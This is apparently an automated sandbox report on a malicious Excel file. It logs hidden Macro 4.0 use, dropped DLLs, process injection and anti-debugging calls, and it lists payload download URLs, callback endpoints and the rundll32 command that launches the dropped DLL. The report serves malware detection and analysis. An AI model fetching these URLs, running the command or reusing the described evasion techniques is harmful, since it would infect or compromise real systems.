Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_008569A0

Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ywmiu\egwih.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 2840

Thread sleep time: -300000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0090A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0090A0CC

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_008569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_008569A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0084D830 LoadLibraryA,GetProcAddress,

4_2_0084D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00852EF0 mov eax, dword ptr fs:[00000030h]	4_2_00852EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00920D28 mov eax, dword ptr fs:[00000030h]	4_2_00920D28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00920C5E mov eax, dword ptr fs:[00000030h]	4_2_00920C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00920865 push dword ptr fs:[00000030h]	4_2_00920865
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A2EF0 mov eax, dword ptr fs:[00000030h]	5_2_000A2EF0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_0090A0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0090ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_0090ABA4

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0084AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

4_2_0084AE40

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: case (166).xls, type: SAMPLE

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000005.00000002.2354558666.0000000000A80000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0090968A cpuid

4_2_0090968A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

4_2_0090F6BB

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_009095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_009095A6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00841A00 CreateDialogParamW,GetVersion,

4_2_00841A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting4	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting4	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery35	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing2	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
case (166).xls	23%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.msiexec.exe.90000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
4.2.rundll32.exe.840000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

Source	Detection	Scanner	Label	Link
gadgetswolf.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	0%	Avira URL Cloud	safe
http://crl3.digicert	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://rnollg.com/kev/scfrd.dll	0%	Avira URL Cloud	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://homesoapmolds.com/post.phpv	0%	Avira URL Cloud	safe
https://gadgetswolf.com/post.php	0%	Avira URL Cloud	safe
https://govemedico.tk/	0%	Avira URL Cloud	safe
https://homesoapmolds.com/post.php	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://gadgetswolf.com/post.phpx	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
https://gadgetswolf.com/A	0%	Avira URL Cloud	safe
https://gadgetswolf.com/post.phpr	0%	Avira URL Cloud	safe
https://gadgetswolf.com/y	0%	Avira URL Cloud	safe
https://homesoapmolds.com/=	0%	Avira URL Cloud	safe
https://govemedico.tk/O	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://rnollg.com/kev/scfrd.dll$8	0%	Avira URL Cloud	safe
https://homesoapmolds.com/	0%	Avira URL Cloud	safe
https://govemedico.tk/post.php	0%	Avira URL Cloud	safe
Https://homesoapmolds.com/post.phpZ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
homesoapmolds.com	172.67.198.109	true	false		unknown
rnollg.com	172.67.150.228	true	false		unknown
gadgetswolf.com	104.21.44.135	true	false	0%, Virustotal, Browse	unknown
govemedico.tk	172.67.158.184	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	A1EE0000.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false		high
http://crl3.digicert	msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rnollg.com/kev/scfrd.dll	before.1.0.0.sheet.csv_unpack	true	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://homesoapmolds.com/post.phpv	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://gadgetswolf.com/post.php	msiexec.exe, 00000005.00000003.2165360506.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/	msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://homesoapmolds.com/post.php	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	false		high
https://gadgetswolf.com/post.phpx	msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2156891016.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156420198.0000000002307000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/A	msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmp	false		high
https://gadgetswolf.com/post.phpr	msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://gadgetswolf.com/y	msiexec.exe, 00000005.00000002.2354459439.0000000000420000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://homesoapmolds.com/=	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2156724187.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2156276281.0000000002120000.00000002.00000001.sdmp	false		high
https://govemedico.tk/O	msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	msiexec.exe, 00000005.00000002.2354613249.0000000001F80000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	case (166).xls	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rnollg.com/kev/scfrd.dll$8	case (166).xls, A1EE0000.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false		high
https://homesoapmolds.com/	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false		high
https://govemedico.tk/post.php	msiexec.exe, 00000005.00000002.2354494113.000000000047D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
Https://homesoapmolds.com/post.phpZ	msiexec.exe, 00000005.00000003.2166786522.000000000047D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.158.184	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.150.228	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.44.135	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.198.109	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344660
Start date:	26.01.2021
Start time:	21:24:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	case (166).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@7/12@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 67.8% (good quality ratio 67.5%) Quality average: 89.5% Quality standard deviation: 19.2%
HCA Information:	Successful, ratio: 84% Number of executed functions: 41 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:25:13	API Interceptor	1195x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200
	IMG_761213.doc	Get hash	malicious	Browse	172.67.188.154
	The Mental Health Center.xlsx	Get hash	malicious	Browse	104.16.19.94
CLOUDFLARENETUS	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200
	IMG_761213.doc	Get hash	malicious	Browse	172.67.188.154
	The Mental Health Center.xlsx	Get hash	malicious	Browse	104.16.19.94
CLOUDFLARENETUS	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200
	IMG_761213.doc	Get hash	malicious	Browse	172.67.188.154
	The Mental Health Center.xlsx	Get hash	malicious	Browse	104.16.19.94

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	PAYMENT.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (547).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	The Mental Health Center.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	Remittance Advice 117301.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	SC-TR1167700000.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (348).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	RefTreeAnalyserXL.xlam	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (426).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (250).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (1447).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (850).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (1543).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case_1581.xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (435).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	INV-LASKUPDF2021.xlsx	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (426).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109
	case (61).xls	Get hash	malicious	Browse	172.67.158.184 172.67.150.228 104.21.44.135 172.67.198.109

Dropped Files

No context

Created / dropped Files

C:\ProgramData\formnet.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Reputation:	low
